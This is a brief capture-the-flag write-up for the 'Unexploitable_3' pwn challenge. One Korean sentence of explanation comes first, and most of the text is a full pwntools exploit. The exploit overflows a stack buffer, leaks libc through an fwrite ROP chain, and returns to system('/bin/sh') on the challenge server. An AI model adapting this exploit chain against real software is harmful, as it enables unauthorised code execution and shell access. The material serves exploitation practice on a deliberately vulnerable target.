
Unexploitable_3

이 문제는 언뜻 보기에 쓸만한 가젯이 없어 보이지만 친절하게 mov rcx, [rdi]; 가젯이 있어서 fwrite를 호출할 수 있다.

import sys
from pwn import *
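# Exploit driver for the hackctf "Unexploitable_3" write-up: overflow the
# stack buffer, ROP into fwrite() to leak a libc address, then return to
# main and do a classic ret2libc system("/bin/sh").
#
# Usage:
#     python exploit.py l   # run ./Unexploitable_3 locally
#     python exploit.py r   # connect to the remote instance
#
# All payload/IO literals are bytes so the script behaves the same under
# Python 2 (where bytes == str) and Python 3 pwntools.
USAGE = "sys.argv[1] = r : remote l : local"

if len(sys.argv) != 2:
    print(USAGE)
    sys.exit(1)
#context.log_level = 'debug'

mode = sys.argv[1].strip()
if mode == 'l':
    p = process('./Unexploitable_3')
elif mode == 'r':
    p = remote('ctf.j0n9hyun.xyz', 3034)
else:
    # The original script only handled 'l' and 'r' and otherwise fell
    # through with `p` and `l` never bound (NameError further down);
    # reject an unknown mode up front with a non-zero exit instead.
    print(USAGE)
    sys.exit(1)

e = ELF('./Unexploitable_3')
if mode == 'l':
    l = e.libc
else:
    # NOTE(review): assumes the remote service runs the same libc build as
    # this local path -- symbol offsets below are taken from it; confirm.
    l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pause()

# Fixed addresses from the challenge binary (values as given in the write-up).
stdout = 0x601050                 # the binary's stdout pointer
stdin = 0x601060                  # the binary's stdin pointer (unused below)
main = 0x40065F                   # re-entered after the leak for a 2nd overflow
m_rcx_rdi = 0x400658              # mov rcx, [rdi] gadget (see write-up text)
p_rdi_ret = 0x0000000000400743    # pop rdi ; ret
p_rsi_r15_ret = 0x0000000000400741  # pop rsi ; pop r15 ; ret

# Stage 1 -- leak.  0x18 bytes of filler reach the saved return address,
# then: rdi = &stdout; rcx = [rdi] (the stdout FILE*); rdi = &fwrite@got;
# rsi = 1; r15 = 0; fwrite@plt; back to main.  rdx (nmemb) is not set by the
# chain and is whatever the previous call left there.
pay = b'a' * 0x10
pay += p64(0)
pay += p64(p_rdi_ret)
pay += p64(stdout)
pay += p64(m_rcx_rdi)
pay += p64(p_rdi_ret)
pay += p64(e.got['fwrite'])
pay += p64(p_rsi_r15_ret)
pay += p64(1)
pay += p64(0)
pay += p64(e.plt['fwrite'])
pay += p64(main)
p.recvuntil(b"Impossible RTL ha? Nothing for you!\n")
p.sendline(pay)

# The 6 bytes ending in 0x7f are the little-endian libc fwrite address;
# subtracting the symbol offset gives the libc base.
libc = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00')) - l.sym['fwrite']
log.info("libc leak : " + hex(libc))

# Stage 2 -- system("/bin/sh") via the same overflow in main.
pay = b'a' * 0x10
pay += p64(0)
pay += p64(p_rdi_ret)
pay += p64(libc + next(l.search(b"/bin/sh\x00")))
pay += p64(libc + l.sym['system'])
p.recvuntil(b"Impossible RTL ha? Nothing for you!\n")
p.sendline(pay)
p.interactive()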

 

 

 
